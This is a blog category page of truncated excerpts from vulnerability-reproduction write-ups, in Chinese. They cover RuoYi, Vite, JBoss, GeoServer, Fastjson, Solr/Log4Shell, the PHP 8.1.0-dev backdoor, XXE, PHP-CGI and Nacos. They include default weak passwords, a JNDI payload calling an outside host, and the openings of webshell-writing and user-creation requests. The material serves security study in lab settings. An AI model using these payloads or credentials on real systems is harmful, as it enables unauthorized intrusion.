随笔分类 -  漏洞复现

摘要:0x01 特征 绿若依 icon_hash=”706913071” 蓝若依 icon_hash=” -1231872293” 0x02 漏洞 弱口令 用户:admin ruoyi druid 密码:123456 admin druid admin123 admin888 若依前台默认shiro ke 阅读全文
posted @ 2025-09-18 17:27 x3c 阅读(991) 评论(0) 推荐(0)
摘要:漏洞描述 在Vite的开发服务器(dev server)模式下,由于路径处理存在缺陷,攻击者可以构造特殊的请求路径,绕过正常的资源服务规则,从而读取项目根目录之外的任意文件。 漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(如?raw??或?import&raw??)时,V 阅读全文
posted @ 2025-09-10 16:49 x3c 阅读(56) 评论(0) 推荐(0)
摘要:辨别版本 有时候我们需要对外网的JBoss的版本进行快速辨别,使用不同的攻击载荷探针进行漏洞探测确认。 通过访问接口辨别 JBoss 4.x(4.0.5)接口特征 /jbossmq-httpil/HTTPServerILServlet接口: JBoss 6.x(6.1.0)接口特征 直接使用工具打进 阅读全文
posted @ 2025-09-10 09:57 x3c 阅读(36) 评论(0) 推荐(0)
摘要:漏洞描述 GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC 阅读全文
posted @ 2025-09-09 08:46 x3c 阅读(219) 评论(0) 推荐(0)
摘要:靶场搭建 直接使用极核靶场 https://hackhub.get-shell.com/games/4/challenges#16-Fastjson-1.2.47 %E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C 靶场 首页 发现登录页面, 阅读全文
posted @ 2025-09-08 18:14 x3c 阅读(22) 评论(0) 推荐(0)
摘要:环境搭建 直接使用极核GetShell靶场 https://hackhub.get-shell.com/ 靶场 Solar系统存在漏洞路径可以传参 http://domain/solr/admin/cores?action= ${jndi:ldap://${sys:java.version}.exa 阅读全文
posted @ 2025-09-08 16:18 x3c 阅读(49) 评论(0) 推荐(0)
摘要:漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 影响范围 PHP 8.1.0-dev 首页 查看版本 抓包构造,加入User-Agentt字段,可见代码var_du 阅读全文
posted @ 2025-08-13 15:35 x3c 阅读(102) 评论(0) 推荐(0)
摘要:漏洞版本 PHP7.0.30 libxml 2.8.0 打开网页看到php版本7.0.30,libxml版本2.8.0,尝试xxe 网站目录下文件 dom.php #使用DOMDocument解析body index.php SimpleXMLElement.php #使用SimpleXMLElem 阅读全文
posted @ 2025-08-13 11:05 x3c 阅读(60) 评论(0) 推荐(0)
摘要:资产 app="XAMPP" 影响范围 PHP Windows版 8.3.0 <= 影响版本 < 8.3.8 PHP Windows版 8.2.0 <= 影响版本 < 8.2.20 PHP Windows版 8.1.0 <= 影响版本 < 8.1.29 PHP Windows版 影响版本 == 8. 阅读全文
posted @ 2025-07-16 09:56 x3c 阅读(46) 评论(0) 推荐(0)
摘要:查看版本 /RAPAgent.XGI?CMD=GetRegInfo 构造数据包造写入木马 POST /AgentBoard.XGI?cmd=UserLogin HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_1 阅读全文
posted @ 2025-07-15 16:39 x3c 阅读(69) 评论(0) 推荐(0)
摘要:路径 /nacos/v1/auth/users?pageNo=1&pageSize=4 POC: POST /nacos/v1/auth/users HTTP/1.1[]() Host: ip Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 阅读全文
posted @ 2025-07-15 16:36 x3c 阅读(65) 评论(0) 推荐(0)